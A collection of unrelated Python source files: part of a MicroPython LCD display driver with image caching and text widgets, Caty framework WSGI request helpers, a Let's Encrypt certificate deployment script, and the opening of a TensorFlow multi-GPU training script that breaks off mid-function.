            self._set_window(x, (width) + x, y, (height) + y)
            f.seek(startbit)
            while True:
                try:
                    self._write_data(f.read(memread))
                except OSError:
                    break
        self._gcCollect()
    def renderBmp(self, filename, pos=None, cached=True, bgcolor=None):
        """Render a BMP by name, preferring the cache when present;
        optionally clear the screen to bgcolor first.
        NOTE(review): forces portrait mode -- landscape rendering is not
        supported yet (see cacheImage)."""
        self.portrait = True
        self._gcCollect()
        notcached = ''
        if bgcolor:
            self.fillMonocolor(bgcolor)
        self._image_orientation()
        if filename + '.' + cachedir not in os.listdir(imgcachepath):
            notcached = 'not cached'
        if not cached or notcached:
            print(filename, imgdir[:-1], notcached)
            self._render_bmp_image(filename, pos)
        elif cached:
            self._render_bmp_cache(filename, pos)
        self._graph_orientation()
    def clearImageCache(self, path):
        """Delete every cache file (*.cache) in `path`."""
        for obj in os.listdir(path):
            if obj.endswith('.' + cachedir):
                os.remove(path + '/' + obj)
    def cacheImage(self, image, imgdir = imgdir):
        """Convert one BMP into a pre-swapped cache file, showing progress
        on screen. Overwrites any existing cache entry."""
        # setting portrait mode, because functionality not full at this moment
        self.portrait = True
        self.fillMonocolor(BLACK)
        strings = self.initCh(color = DARKGREY, font = 'Arial_14')
        strings.printLn("Caching:", 25, 25)
        strings.printLn(image + '...', 45, 45)
        memread = 60
        cachedimage = image + '.' + cachedir
        if cachedimage in os.listdir(imgcachepath):
            os.remove(imgcachepath + '/' + cachedimage)
        with open(imgdir + '/' + image, 'rb') as f:
            startbit, width, height = self._set_image_headers(f)
            c = open(imgcachepath + '/' + cachedimage, 'wb')
            # header: width and height, one 'H'-packed line each
            for val in [width, height]:
                c.write(bytes(array('H', [val])) + b"\n")
            f.seek(startbit)
            data = '1'
            # copy pixel data in small chunks, byte-swapping as we go
            while len(data) != 0:
                try:
                    data = bytearray(f.read(memread))
                    self._reverse(data, len(data))
                    c.write(data)
                except OSError as err:
                    break
            c.close()
        self.fillMonocolor(BLACK)
        strings.printLn(image + " cached", 25, 25)
        print('Cached:', image)
        del(strings)
        sleep(0.1)
        self._gcCollect()
    def cacheAllImages(self, imgdir = imgdir):
        """Create the cache directory if missing, then cache every image
        found in `imgdir`."""
        if cachedir not in os.listdir(imgdir):
            os.chdir(imgdir)
            os.mkdir('cache')
            # return to the filesystem root (SD card first, flash fallback)
            try:
                os.chdir('/sd')
            except OSError:
                os.chdir('/flash')
        for image in os.listdir(imgdir):
            if image == cachedir: continue
            self.cacheImage(image, imgdir=imgdir)
            # delay for better and stable result
            sleep(0.1)
class Chars(BaseChars):
    """
    User-facing character object returned by LCD.initCh(). Adds
    font/fontscale/portrait properties on top of BaseChars rendering.
    """
    def printChar(self, *args, **kwargs):
        """Draw a single character (see BaseChars.printChar)."""
        super(Chars, self).printChar(*args, **kwargs)
    def printLn(self, *args, **kwargs):
        """Print a word-wrapped string (see BaseChars.printLn)."""
        super(Chars, self).printLn(*args, **kwargs)
    @property
    def font(self):
        """The imported font dict currently in use."""
        return self._font
    @font.setter
    def font(self, font):
        # Re-import on assignment so users can write s.font = 'Arial_14'.
        import fonts
        font = fonts.importing(font)
        self._font = font
        del(fonts)
    @property
    def fontscale(self):
        """Integer glyph scale factor."""
        return self._fontscale
    # BUGFIX: fontscale was a getter-only property, but
    # BaseChars.printChar assigns "self.fontscale = ..." -- without a
    # setter that assignment raises AttributeError on Chars instances.
    @fontscale.setter
    def fontscale(self, scale):
        self._fontscale = scale
    @property
    def portrait(self):
        """Current orientation flag (True = portrait)."""
        return self._portrait
    @portrait.setter
    def portrait(self, portr):
        if not isinstance(portr, bool):
            from exceptions import PortraitBoolError
            raise PortraitBoolError
        self._portrait = portr
        self.setDimensions()
class BaseWidgets(BaseDraw, BaseImages):
    """
    Smart label/button widgets: computes string pixel widths, wraps words
    to fit the widget box, and centers the text inside a drawn rectangle.
    """
    def _charwidth_mapper(self, char):
        """Pixel advance of one character in the current font; 5 for a
        space, 0 for glyphs missing from the font."""
        try:
            chrwidth = len(self._font[ord(char)])
            chpos = self._return_chpos(chrwidth, 1) + 3 + chrwidth
            return chpos
        except KeyError:
            # BUGFIX: was "ord(char) is 32" -- identity comparison against
            # an int literal is implementation-defined; compare by value.
            return 5 if ord(char) == 32 else 0
    def _get_maxstrW(self, width):
        # compute max string length
        return (width - 20 - self._border * 2)
    def _get_widgW(self, width):
        # compute widget width
        return width + 20 + self._border * 2
    @micropython.viper
    def _get_strW(self, string):
        # getting current string length (in pixels)
        return sum(map(self._charwidth_mapper, string))
    def _compute_lines(self, string, maxstrW):
        """Greedy word wrap: split `string` into [pixelWidth, text] lines
        no wider than maxstrW. A first word that cannot fit collapses the
        whole widget text to the '(..)' placeholder."""
        words = string.split(' ')
        lines = [[0,]]
        i = 0
        space = self._get_strW(chr(32))
        for word in words:
            lenw = self._get_strW(word)
            if lines[i][0] + lenw >= maxstrW:
                if not i and not lines[0][0]: # if first word is too large
                    len_bl = self._get_strW(self._blank)
                    assert len_bl < maxstrW, self._asserts
                    print(self._asserts)
                    return [[len_bl, self._blank]] # return '(..)'
                lines.append([0, ])
                i += 1
            lines[i][0] += lenw + space
            lines[i].append(word)
        # drop the trailing space from each accumulated width
        return [[line[0] - space, ' '.join(line[1:])] for line in lines]
    def _get_str_structure(self, string, xy, width, height):
        """Compute the widget layout structure:
        [widgetWidth, widgetHeight, strHeight, line0, line1, ...]
        where each line is [pixelWidth, text]. Lines that would overflow a
        fixed height are truncated and the last line gets the '(..)'
        placeholder appended."""
        x, y = xy
        maxW = width if width and width < self.curWidth else self.curWidth - x - 5 # max widget width
        maxH = height if height and height < self.curHeight else self.curHeight - y - 5 # max widget height
        border = self._border
        maxstrW = self._get_maxstrW(maxW) # max string width
        strwidth = self._get_strW(string) # current string width
        strheight = self._font['height']
        assert strheight < maxH, self._asserts
        widgH = strheight + 6 + border * 2 if height is None else maxH
        # setting [widgetWidth, widgetHeight, strHeight] to the structure
        structure = [0, widgH, strheight]
        # if width and height are defined, large string cuts to widget scale
        if strwidth >= maxstrW:
            structure.extend(self._compute_lines(string, maxstrW))
            linen = len(structure[3:]) # structure[3:] = all lines
            widgH = strheight * linen + 3 * (linen + 1) + border * 2
            structure[1] = widgH if height is None else maxH
            if widgH > maxH:
                # too many lines for the fixed height: truncate and mark
                # the last visible line with the '(..)' placeholder
                linen = maxH // (strheight + 3)
                strheight = strheight * linen + 3 * (linen-1)
                structure = structure[:linen + 3]
                structure[-1][1] += self._blank
                strW = self._get_strW(structure[-1][1])
                if strW > maxstrW:
                    structure[-1][1] = self._blank
                    strW = self._get_strW(structure[-1][1])
                structure[-1][0] = strW
                print(self._asserts)
            else:
                strheight = widgH - 6 - border * 2
            largest = max(structure[3:])[0]
            structure[0] = self._get_widgW(largest) if width is None else maxW
            structure[2] = strheight
        else:
            # single line fits as-is
            structure[0] = self._get_widgW(strwidth) if width is None else maxW
            structure.extend([(strwidth, string)])
        self._gcCollect()
        return structure
    def _widget(self, x, y, color, infill, string, width = None,
                height = None, strobj = None, border = 1):
        """Draw a bordered, filled widget box with centered, word-wrapped
        text rendered via `strobj` (a Chars instance). Returns the widget
        bounding box (x, y, x1, y1)."""
        if strobj is None:
            from exceptions import NoneStringObject
            raise NoneStringObject
        border = 10 if border > 10 else border
        self._blank = '(..)'
        self._asserts = 'widget dims too low'
        self._font = strobj.font
        strobj._fontscale = 1 # widget font scale always is 1
        self._border = border
        strheight = strobj.font['height']
        structure = self._get_str_structure(string, (x, y), width, height)
        lines = structure[3:]
        linen = len(lines)
        width, height, strheight = structure[:3]
        self._gcCollect()
        self.drawRect(x, y, width, height, color, border=border, infill=infill)
        # vertical step between text lines (0 for a single line)
        Y = strheight // linen if linen > 1 else 0
        strY = (height - strheight) // 2 + y + 3
        for line in lines:
            strwidth, string = line
            strX = ((width - strwidth) // 2) + x + 3
            strobj.printLn(string, strX, strY)
            strY += Y
        x1, y1 = x + width, y + height
        return x, y, x1, y1
class Widgets(BaseWidgets):
    """Public widget facade over BaseWidgets._widget."""
    def label(self, *args, **kwargs):
        # Fire-and-forget: draws the widget, discards its geometry.
        BaseWidgets._widget(self, *args, **kwargs)
    def button(self, *args, **kwargs):
        # Returns (x, y, x1, y1) so callers can hit-test the touch area.
        return BaseWidgets._widget(self, *args, **kwargs)
    def entry(self):
        # Not implemented yet.
        pass
class LCD(Widgets):
    """
    Top-level user API: combines the ILI driver, drawing primitives,
    image rendering and widgets. Instantiate with LCD(portrait=True/False).
    """
    def reset(self):
        super(LCD, self).reset()
    def drawPixel(self, *args, **kwargs):
        super(LCD, self).drawPixel(*args, **kwargs)
    def drawVline(self, *args, **kwargs):
        super(LCD, self).drawVline(*args, **kwargs)
    def drawHline(self, *args, **kwargs):
        super(LCD, self).drawHline(*args, **kwargs)
    def drawLine(self, *args, **kwargs):
        super(LCD, self).drawLine(*args, **kwargs)
    def drawRect(self, *args, **kwargs):
        super(LCD, self).drawRect(*args, **kwargs)
    def fillMonocolor(self, *args, **kwargs):
        super(LCD, self).fillMonocolor(*args, **kwargs)
    def drawCircleFilled(self, *args, **kwargs):
        super(LCD, self).drawCircleFilled(*args, **kwargs)
    def drawCircle(self, *args, **kwargs):
        super(LCD, self).drawCircle(*args, **kwargs)
    def drawOvalFilled(self, *args, **kwargs):
        super(LCD, self).drawOvalFilled(*args, **kwargs)
    def initCh(self, **kwargs):
        """Create a Chars string object bound to this display's current
        orientation, e.g. s = lcd.initCh(color=..., font='Arial_14')."""
        # BUGFIX: was Chars(portrait=ILI.portrait, ...) -- ILI.portrait is
        # the property object itself (always truthy), not this display's
        # orientation flag.
        ch = Chars(portrait=self._portrait, **kwargs)
        return ch
    def renderBmp(self, *args, **kwargs):
        super(LCD, self).renderBmp(*args, **kwargs)
    def clearImageCache(self, *args, **kwargs):
        super(LCD, self).clearImageCache(*args, **kwargs)
    def cacheImage(self, *args, **kwargs):
        super(LCD, self).cacheImage(*args, **kwargs)
    def cacheAllImages(self, *args, **kwargs):
        super(LCD, self).cacheAllImages(*args, **kwargs)
    def label(self, *args, **kwargs):
        return super(LCD, self).label(*args, **kwargs)
    @property
    def portrait(self):
        """Current orientation flag; assign True/False to rotate on the fly."""
        return self._portrait
    @portrait.setter
    def portrait(self, portr):
        if not isinstance(portr, bool):
            from exceptions import PortraitBoolError
            raise PortraitBoolError
        self._portrait = portr
        self.setDimensions()
    @property
    def resolution(self):
        """Print and return the current (width, height) in pixels."""
        print(self.curWidth, self.curHeight)
        # Also return the values (previously returned None), so the
        # property is usable programmatically; backward-compatible.
        return (self.curWidth, self.curHeight)
|
<reponame>hidaruma/caty
# coding: utf-8
import xjson
from caty.core.command import Builtin
from caty.core.exception import *
import caty.jsontools as json
import caty.jsontools.stdjson as stdjson
from caty.util.collection import conditional_dict
from StringIO import StringIO
from caty.util.web import find_encoding
class MakeEnv(Builtin):
    """
    Caty command that builds a WSGI-style environ dict from command
    options, a request path and an optional query string. (Python 2 code:
    uses `unicode` and StringIO.)
    """
    def setup(self, opts, path, query=u''):
        # Copy the parsed command options onto the instance.
        self.__fullpath = opts['fullpath']
        self.__method = opts['method'].upper()
        self.__verb = opts['verb']
        self.__content_type = opts['content-type']
        self.__multiprocess = opts['multiprocess']
        self.__multithread = opts['multithread']
        self.__server_name = opts['server-name']
        self.__server_port = opts['server-port']
        self.__url_scheme = opts['url-scheme']
        self.__query = query
        self.__path = path
    def execute(self, input):
        """Validate the input/method combination, fill defaults, and
        return the assembled environ dict (None-valued keys dropped by
        conditional_dict). `input` becomes the request body."""
        self._validate_input(input)
        self._fill_default_value()
        if not self.__content_type:
            # default content type depends on whether the body is text
            self.__content_type = u'text/plain' if isinstance(input, unicode) else u'application/octet-stream'
        chunk = self.__path.strip(u'/').split(u'/')
        system = self.current_app._system
        script_name = self.current_app.name
        path = self.__path
        istream = StringIO()
        if self.__fullpath:
            # First path segment may name another application; route to it
            # unless it is one of the reserved app names.
            top = chunk.pop(0)
            if top in system.app_names and top not in (u'caty', u'global'):
                script_name = top
                path = u'/' + u'/'.join(chunk)
            else:
                path = self.__path
                script_name = u''
        elif script_name == u'root':
            # the root application mounts at the empty script name
            script_name = u''
        if isinstance(input, unicode):
            # encode text bodies using the content-type charset, falling
            # back to the application encoding
            input = input.encode(find_encoding(self.__content_type) or self.current_app.encoding)
        length = u''
        if input:
            length = unicode(str(len(input)))
            istream.write(input)
            istream.seek(0)
        verb = None
        if self.__verb:
            # Caty encodes its verb as a reserved query parameter
            verb = u'_verb=%s' % self.__verb
        query = u'&'.join([s for s in [verb, self.__query] if s])
        return conditional_dict(lambda k, v: v is not None,
                                {u'REQUEST_METHOD': self.__method,
                                 u'QUERY_STRING': query,
                                 u'SCRIPT_NAME': script_name,
                                 u'PATH_INFO': path,
                                 u'CONTENT_TYPE': self.__content_type,
                                 u'CONTENT_LENGTH': length,
                                 u'SERVER_NAME': self.__server_name.split(u'//')[-1],
                                 u'SERVER_PORT': unicode(self.__server_port),
                                 u'SERVER_PROTOCOL': u'HTTP/1.1',
                                 u'wsgi.input': istream,
                                 u'wsgi.run_once': False,
                                 u'wsgi.multithread': self.__multithread,
                                 u'wsgi.multiprocess': self.__multiprocess,
                                 u'wsgi.version': (1,0),
                                 u'wsgi.url_scheme': self.__url_scheme,
                                 })
    def _validate_input(self, input):
        # Bodyless methods must have no body and no content-type;
        # PUT/POST require a body.
        if self.__method in (u'GET', u'HEAD', u'DELETE') and input is not None:
            throw_caty_exception(u'InvalidInput', u'Input must be null')
        if self.__method in (u'GET', u'HEAD', u'DELETE') and self.__content_type:
            throw_caty_exception(u'InvalidInput', u'content-type can not be specified')
        if self.__method in (u'PUT', u'POST') and input is None:
            throw_caty_exception(u'InvalidInput', u'Input must not be null')
    def _fill_default_value(self):
        # Substitute global-config defaults for UNDEFINED server options.
        from caty import UNDEFINED
        system = self.current_app._system
        if self.__server_name is UNDEFINED:
            self.__server_name = system._global_config.server_name
        if self.__server_port is UNDEFINED:
            self.__server_port = system._global_config.server_port
class ReqToEnv(Builtin):
    """Convert a request record (method/path/body/query/...) into a WSGI environ dict.

    Entries whose value is None are dropped via conditional_dict.
    """
    def execute(self, req):
        # Reject method/body combinations that make no sense (e.g. GET with body).
        self._validate_input(req)
        # Default the content type from the body's Python type when absent.
        if not 'contentType' in req:
            req['contentType'] = u'text/plain' if isinstance(req['body'], unicode) else u'application/octet-stream'
        chunk = req['path'].strip(u'/').split(u'/')
        path = req['path']
        system = self.current_app._system
        script_name = self.current_app.name
        istream = StringIO()
        # With a full path, the first segment may name the target application.
        if len(chunk) >= 2 and req['fullpath']:
            top = chunk.pop(0)
            if top in system.app_names and top not in (u'caty', u'global'):
                script_name = top
                path = u'/' + u'/'.join(chunk)
        elif script_name == u'root':
            # The root application is addressed with an empty SCRIPT_NAME.
            script_name = u''
        input = req['body']
        if isinstance(input, unicode):
            # Encode text bodies; 'encoding' may be absent from the request record.
            input = input.encode(req.get('encoding') or self.current_app.encoding)
        length = u''
        if input:
            length = unicode(str(len(input)))
            istream.write(input)
            istream.seek(0)
        verb = None
        queries = []
        if req['verb']:
            verb = u'_verb=%s' % req['verb']
        if req['query']:
            if isinstance(req['query'], dict):
                for k, v in req['query'].items():
                    # NOTE(review): values are interpolated unescaped — presumably
                    # already URL-safe; confirm against callers.
                    queries.append('%s=%s' % (k, v))
            else:
                queries = [req['query']]
        query = u'&'.join([s for s in [verb] + queries if s])
        # None-valued entries are filtered out of the environ.
        r = conditional_dict(lambda k, v: v is not None,
                {u'REQUEST_METHOD': req['method'],
                 u'QUERY_STRING': query,
                 u'SCRIPT_NAME': script_name,
                 u'PATH_INFO': path,
                 u'CONTENT_TYPE': req['contentType'],
                 u'CONTENT_LENGTH': length,
                 u'SERVER_NAME': system._global_config.server_name.split(u'//')[-1],
                 u'SERVER_PORT': unicode(system._global_config.server_port),
                 u'SERVER_PROTOCOL': u'HTTP/1.1',
                 u'wsgi.input': istream,
                 u'wsgi.run_once': False,
                 u'wsgi.multithread': True,
                 u'wsgi.multiprocess': False,
                 u'wsgi.version': (1,0),
                 u'wsgi.url_scheme': u'http',
                })
        # Optional cookie and extra headers are merged on top of the environ.
        if req.get('cookie'):
            r['cookie'] = req['cookie']
        r.update(req.get('header', {}))
        return r
    def _validate_input(self, req):
        """Raise InvalidInput when body/content-type conflict with the method."""
        method = req['method']
        input = req['body']
        if method in (u'GET', u'HEAD', u'DELETE') and input is not None:
            throw_caty_exception(u'InvalidInput', u'Input must be null')
        if method in (u'GET', u'HEAD', u'DELETE') and req.get('contentType'):
            throw_caty_exception(u'InvalidInput', u'content-type can not be specified')
        if method in (u'PUT', u'POST') and input is None:
            throw_caty_exception(u'InvalidInput', u'Input must not be null')
class CallApplication(Builtin):
    """Dispatch a prepared WSGI environ to a Caty application in-process.

    With the 'no-middle' option the request bypasses the configured server
    middleware and runs through InternalCatyApp directly.
    """
    def setup(self, opts):
        # Whether to skip the server middleware stack.
        self.__no_middle = opts['no-middle']
    def execute(self, environ):
        environ['REMOTE_ADDR'] = u'127.0.0.1'
        environ['SERVER_PORT'] = str(environ['SERVER_PORT'])
        system = self.current_app._system
        if self.__no_middle:
            wsgi_app_cls = InternalCatyApp
        else:
            server_module_name = system.server_module_name
            # Python 2 exec statement: import the configured server module by name.
            exec 'import %s as server_module' % server_module_name
            wsgi_app_cls = server_module.get_app_class()
        path = environ['PATH_INFO']
        # Empty SCRIPT_NAME means the root application.
        app_name = environ['SCRIPT_NAME'] or u'root'
        del environ['SCRIPT_NAME']
        app = system.get_app(app_name)
        if app_name != u'root':
            # Re-prefix the application name onto the dispatch path.
            path = u'/%s%s' % (app_name, path) if path else u'/%s/' % app_name
        environ['PATH_INFO'] = path
        response_handler = ResponseHandler()
        # Wrap the app with the session middleware before starting it.
        wsgi_app = system._global_config.session.wrapper(
            wsgi_app_cls(app, system.debug, system),
            system._global_config.session.conf)
        output = wsgi_app.start(environ, response_handler.start_response)
        return response_handler.make_response(output)
class ResponseHandler(object):
    """Captures the status line and headers handed to start_response and
    packages them, together with the body iterable, into a response dict."""
    def __init__(self):
        self.status = None
        self.headers = {}
    def start_response(self, status, headers, exc_info=None):
        """WSGI start_response callable; validates then records status/headers."""
        from types import StringType
        # Sanity-check the status line and headers per the WSGI spec.
        assert type(status) is StringType,"Status must be a string"
        assert len(status)>=4,"Status must be at least 4 characters"
        assert int(status[:3]),"Status message must begin w/3-digit code"
        assert status[3]==" ", "Status message must have a space after code"
        for name,val in headers:
            assert type(name) is StringType,"Header names must be strings"
            assert type(val) is StringType,"Header values must be strings"
        self.status = status
        for header_name, header_value in headers:
            self.headers[header_name] = unicode(header_value)
        return self.make_response
    def make_response(self, data):
        """Fold the recorded status/headers and the body chunks into a dict."""
        status_code = int(self.status.split(' ')[0])
        return {
            u'status': status_code,
            u'header': self.headers,
            u'body': ''.join(data)
        }
class ProcessEnv(Builtin):
    """Run an environ through the configured server module's handler preprocessing."""
    def execute(self, environ):
        system = self.current_app._system
        server_module_name = system.server_module_name
        # Python 2 exec statement: import the configured server module by name.
        exec 'import %s as server_module' % server_module_name
        # The handler is constructed without a server instance (None).
        handler = server_module.get_handler_class()(None)
        return handler.process_env(environ)
class Perform(Builtin):
    """Run a request environ through InternalCatyApp directly (no middleware)."""
    def execute(self, environ):
        environ['REMOTE_ADDR'] = u'127.0.0.1'
        environ['SERVER_PORT'] = str(environ['SERVER_PORT'])
        system = self.current_app._system
        # Empty SCRIPT_NAME addresses the root application.
        app_name = environ.pop('SCRIPT_NAME') or u'root'
        target_app = system.get_app(app_name)
        path = environ['PATH_INFO']
        if app_name != u'root':
            # Re-prefix the application name onto the dispatch path.
            path = u'/%s%s' % (app_name, path) if path else u'/%s/' % app_name
        environ['PATH_INFO'] = path
        environ['caty.session'] = system._global_config.session.storage.create_session(environ)
        return InternalCatyApp(target_app, system.debug, system).main(environ)
class Lookup(Builtin):
    """Resolve an environ to its action entry and input without executing it."""
    def execute(self, environ):
        system = self.current_app._system
        environ['REMOTE_ADDR'] = u'127.0.0.1'
        environ['SERVER_PORT'] = str(environ['SERVER_PORT'])
        # Empty SCRIPT_NAME addresses the root application.
        app_name = environ.pop('SCRIPT_NAME') or u'root'
        target_app = system.get_app(app_name)
        original_path = environ['PATH_INFO']
        if app_name == u'root':
            dispatch_path = original_path
        else:
            # Re-prefix the application name onto the dispatch path.
            dispatch_path = u'/%s%s' % (app_name, original_path) if original_path else u'/%s/' % app_name
        environ['PATH_INFO'] = dispatch_path
        environ['caty.session'] = system._global_config.session.storage.create_session(environ)
        wsgi_app = InternalCatyApp(target_app, system.debug, system)
        entry, input = wsgi_app.get_action_and_input(environ)
        # Restore the caller-visible path before handing the environ back.
        environ['PATH_INFO'] = original_path
        return {
            u'app': app_name,
            u'setEnv': environ,
            u'clearEnv': True,
            u'callable': entry.canonical_name,
            u'arg0': original_path,
            u'input': input
        }
from caty.front.web.app import CatyApp, HTTP_STATUS
class InternalCatyApp(CatyApp):
    """CatyApp variant driven in-process, without a real WSGI server.

    _end_proc turns a command's JSON result into a WSGI-style response;
    get_action_and_input resolves an environ to its action entry plus the
    decoded input without running the action.
    """
    def _end_proc(self, json, headers, start_response):
        # NOTE: `json` is the result dict, not the stdlib module — the
        # parameter name is kept for interface compatibility.
        # Fix: removed a dead `status = 200` assignment that was immediately
        # overwritten; the status line always comes from the result's
        # 'status' field (defaulting to 200).
        status = HTTP_STATUS[json.get('status', 200)]
        start_response(status, headers)
        if 'body' in json:
            b = json['body']
            return [b]
        else:
            return []
    def get_action_and_input(self, environ):
        """Resolve *environ* to (resource entry, input) without executing the action."""
        from caty.core.handler import RequestHandler
        path = environ['PATH_INFO']
        query = self._get_query(environ)
        # CONTENT_LENGTH may be the empty string; treat that as zero bytes.
        raw_input = environ['wsgi.input'].read(int(environ['CONTENT_LENGTH'] or 0))
        input, options, method, environ = self._process_env(raw_input, query, environ)
        if method not in (u'POST', u'PUT'):
            # Bodyless methods carry no input.
            input = None
        facilities = self._app.create_facilities(lambda : environ['caty.session'])
        del environ['PATH_INFO']  # keep init_env from seeing the raw PATH_INFO
        if self._system.wildcat:
            self._app.init_env(facilities, self.is_debug, [u'web', u'test'], self._system, environ)
        else:
            self._app.init_env(facilities, self.is_debug, [u'web'], self._system, environ)
        handler = RequestHandler(facilities['interpreter'],
                                 facilities['env'],
                                 self._app)
        path, _ = handler._create_path_and_vpath(path)
        entry = handler._verb_dispatcher.get(handler._file, path, options.pop('_verb', u''), environ['REQUEST_METHOD'], False)
        return entry.resource_class_entry, input
class MapException(Builtin):
    """Rebuild a tagged exception value and route it through the error dispatcher."""
    def execute(self, e):
        from caty.core.handler import ErrorDispacher
        from caty.core.exception import CatyException
        # Reconstruct the CatyException from the tagged value, then dispatch.
        # (sic: "ErrorDispacher" is the project's spelling.)
        exc = CatyException(e.tag, **e.value)
        return ErrorDispacher(self.i18n).dispatch_error(exc)
class MapSignal(Builtin):
    """Route a signal value through the error dispatcher."""
    def execute(self, e):
        from caty.core.handler import ErrorDispacher
        dispatcher = ErrorDispacher(self.i18n)
        return dispatcher.dispatch_signal(e)
|
#!/usr/bin/env python
"""
Copyright (c) 2016-2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
"""
import os
import sys
import shutil
import filecmp
import subprocess
import yaml
# Path template for certificates managed by dehydrated (letsencrypt.sh);
# {domain} is the certificate domain, {pem} the file type — presumably
# cert/chain/privkey etc.; confirm against the deploy config.
LETSENCRYPT_ROOT = '/etc/dehydrated/certs/{domain}/{pem}.pem'
# Per-user deployment config file (YAML).
CONFIG_FILE = os.path.join(os.path.expanduser('~'), '.config', 'dehydrated', 'deploy.conf')
# Generic "file not found" error message template used with sys.exit().
ERROR = ' + ERROR: Could not locate {name} files:\n\t{files}'
def parse_config():
    """Parse the user deployment config file.

    Returns the parsed YAML data; exits the process with an error message
    when the config file does not exist.
    """
    print(f'# INFO: Using deployment config file {CONFIG_FILE}')
    # Make sure file exists
    if not os.path.exists(CONFIG_FILE):
        sys.exit(ERROR.format(name='deployment config', files=CONFIG_FILE))
    # Fix: use safe_load (yaml.load without an explicit Loader is deprecated
    # and unsafe on untrusted input) and close the file deterministically.
    with open(CONFIG_FILE, 'r') as config_file:
        return yaml.safe_load(config_file)
def deploy_file(file_type, old_file, new_file):
    """Replace *old_file* with *new_file*, keeping a .bak copy of the old
    version and preserving its ownership and permissions.

    Returns True when a deployment happened, False when the files already match.
    """
    if filecmp.cmp(old_file, new_file):
        print(f' + WARNING: {old_file} matches new {file_type}, skipping deployment')
        return False
    # Remember ownership/permissions of the file being replaced.
    original_stat = os.stat(old_file)
    # Keep the previous version around as a backup.
    os.rename(old_file, f'{old_file}.bak')
    shutil.copy(new_file, old_file)
    # Restore ownership and permissions on the deployed copy.
    os.chown(old_file, original_stat.st_uid, original_stat.st_gid)
    os.chmod(old_file, original_stat.st_mode)
    print(f' + Successfully deployed new {file_type} to {old_file}')
    return True
def deploy_domain(domain, config):
    """Deploy freshly issued files for *domain*.

    *config* is the list of deployment locations for the domain, each a
    mapping of file type -> currently deployed path. Exits when either the
    new or the old file is missing. Returns True if anything was deployed.
    """
    print(f'Deploying new files for: {domain}')
    did_deploy = False
    for location in config:
        for file_type in location.keys():
            # Locate the freshly issued version of this file type.
            new_file = LETSENCRYPT_ROOT.format(domain=domain, pem=file_type)
            if not os.path.exists(new_file):
                sys.exit(ERROR.format(name=f'new {file_type}', files=new_file))
            # Locate the currently deployed version.
            old_file = location[file_type]
            if not os.path.exists(old_file):
                sys.exit(ERROR.format(name=f'old {file_type}', files=old_file))
            # Deploy and track whether anything actually changed.
            if deploy_file(file_type, old_file, new_file):
                did_deploy = True
    return did_deploy
def run_deployment():
    """Deploy new cert files for every configured domain, then run the
    configured post-deployment actions if anything changed."""
    print('Starting new file deployment')
    config = parse_config()
    # Deploy each domain and remember whether anything actually changed.
    deployed_any = False
    for domain, locations in config['domains'].items():
        if deploy_domain(domain, locations):
            deployed_any = True
    # Post-deployment actions only make sense when something was deployed.
    if deployed_any:
        print('Starting post-deployment actions')
        for action in config['post_actions']:
            print(f' + Attempting action: {action}')
            try:
                status = subprocess.call(action, shell=True)
                print(f' + Action exited with status {status}')
            except OSError as error:
                print(f' + ERROR: {error}')
    print('New file deployment done.')
if __name__ == '__main__':
    run_deployment()
|
<reponame>yuxiaoguo/VVNet
# MSRA Internal Graphics
#
"""
Examples:
"""
import os
import logging
import tensorflow as tf
import models
from scripts import dataset
# Suppress TensorFlow C++ log chatter (level '3' keeps only the most severe messages).
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def loss(logit, label, depth, scene_info, categories=12, scope='loss'):
    """Mean softmax cross-entropy between voxel logits and labels.

    Args:
        logit: prediction tensor; reshaped to [-1, categories] when a
            validity mask is derived.
        label: ground-truth label tensor.
        depth, scene_info: passed to Network.optional_label to derive the
            optional (label, indices) mask.
        categories: number of semantic classes (default 12).
        scope: name scope for the created ops.

    Returns:
        Scalar tensor: mean cross-entropy over the (optionally masked) voxels.
    """
    with tf.name_scope(scope) as _:
        label, indices = models.network.Network.optional_label(label, depth, scene_info)
        if indices is not None:
            # Fix: reshape by `categories` instead of the hard-coded 12 so the
            # function honours its own parameter (identical for the default).
            logit = tf.reshape(logit, [-1, categories])
            logit = tf.gather_nd(logit, indices)
            # NOTE(review): label is cast float32 -> gathered -> cast back to
            # int32; presumably gather_nd needs a float input here — confirm
            # before simplifying.
            label = tf.cast(label, tf.float32)
            label = tf.gather_nd(label, indices)
            label = tf.cast(label, tf.int32)
        label_oh = tf.one_hot(label, categories)
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=label_oh, logits=logit, name='ce_vox')
        cross_entropy_mean = tf.reduce_mean(cross_entropy, name='ce_mean')
        return cross_entropy_mean
def average_gradient(tower_grads):
    """Average per-variable gradients across GPU towers.

    *tower_grads* is a list (one per tower) of (gradient, variable) lists,
    as produced by Optimizer.compute_gradients. Returns one averaged
    (gradient, variable) list.
    """
    averaged = []
    for per_tower in zip(*tower_grads):
        # Stack this variable's gradients from every tower and take the mean.
        stacked = tf.concat([tf.expand_dims(g, 0) for g, _ in per_tower], axis=0)
        mean_grad = tf.reduce_mean(stacked, 0)
        # The variable is shared across towers; take it from the first one.
        averaged.append((mean_grad, per_tower[0][1]))
    return averaged
def average_losses(tower_losses):
    """Mean of scalar per-tower losses, returned as a single tensor."""
    expanded = [tf.expand_dims(tower_loss, 0) for tower_loss in tower_losses]
    return tf.reduce_mean(tf.concat(expanded, axis=0), 0)
def train_phase_network(net, args):
    """Build the multi-GPU training graph for *net*.

    Returns (train summary op, avg-train-loss placeholder, loss tensor, train op).
    """
    logging.info('=====train network definition=====')
    # data: every *.tfrecord under the training dir whose name contains 'train'
    training_data_dir = args.input_training_data_path
    data_records = [item for item in os.listdir(training_data_dir) if item.endswith('.tfrecord')]
    train_records = [os.path.join(training_data_dir, item) for item in data_records if item.find('train') != -1]
    logging.info('available training resource: %s', train_records)
    batch_size = args.batch_per_device * args.input_gpu_nums
    reader = dataset.SceneReader(train_records, shuffle=True, batch_size=batch_size, num_threads=20)
    logging.info('batch size for reader: %s', batch_size)
    # optimizer: SGD with momentum, step-decayed learning rate (x0.1 every 100k steps)
    global_step = tf.Variable(0, trainable=False, name='global_step')
    starter_lr = 0.01
    lr_scheme = tf.train.exponential_decay(starter_lr, global_step, 100000, 0.1, staircase=True)
    opt = tf.train.MomentumOptimizer(lr_scheme, 0.9)
